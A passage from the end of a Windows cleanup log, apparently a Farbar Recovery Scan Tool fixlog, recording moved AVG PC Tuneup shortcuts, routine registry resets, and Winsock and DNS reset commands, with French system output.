2011\Utilities\AVG Disk Doctor.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Wiper.lnk => moved 
successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Duplicate File Finder.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG File Recovery.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG File Shredder.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Internet Optimizer.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Registry Defrag.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Rescue Center.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Service Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Startup Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG System Information.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Task Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Track Eraser.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Tweak Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Uninstall Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011 => moved successfully "C:\Program Files (x86)\AVG\AVG PC Tuneup 2011" => not found ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V Enable /T REG_SZ /D n /f ========= L'opération a réussi. 
========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V OptimizeComplete /T REG_SZ /D no /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V PowerdownAfterShutdown /T REG_SZ /D 1 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /V ClearPageFileAtShutdown /T REG_DWORD /D 0 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V MenuShowDelay /T REG_SZ /D 400 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V WaitToKillAppTimeout /T REG_SZ /D 1200 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V HungAppTimeout /T REG_SZ /D 1200 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V AutoEndTasks /T REG_SZ /D 1 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /V WaitToKillServiceTimeout /T REG_SZ /D 1200 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /V EnableLUA /T REG_DWORD /D 1 /f ========= L'opération a réussi. ========= End of Reg: ========= ========= bitsadmin /reset ========= 'bitsadmin' n'est pas reconnu en tant que commande interne ou externe, un programme exécutable ou un fichier de commandes. ========= End of CMD: ========= ========= netsh winsock reset ========= Le catalogue Winsock a été réinitialisé correctement. 
Vous devez redémarrer l'ordinateur afin de finaliser la réinitialisation. ========= End of CMD: ========= ========= ipconfig /flushdns ========= Configuration IP de Windows Impossible de vider le cache de résolution DNS : La fonction a échoué lors de l'exécution. ========= End of CMD: ========= EmptyTemp: => Error: This directive works only outside recovery mode. ==== End of Fixlog 21:08:09 ====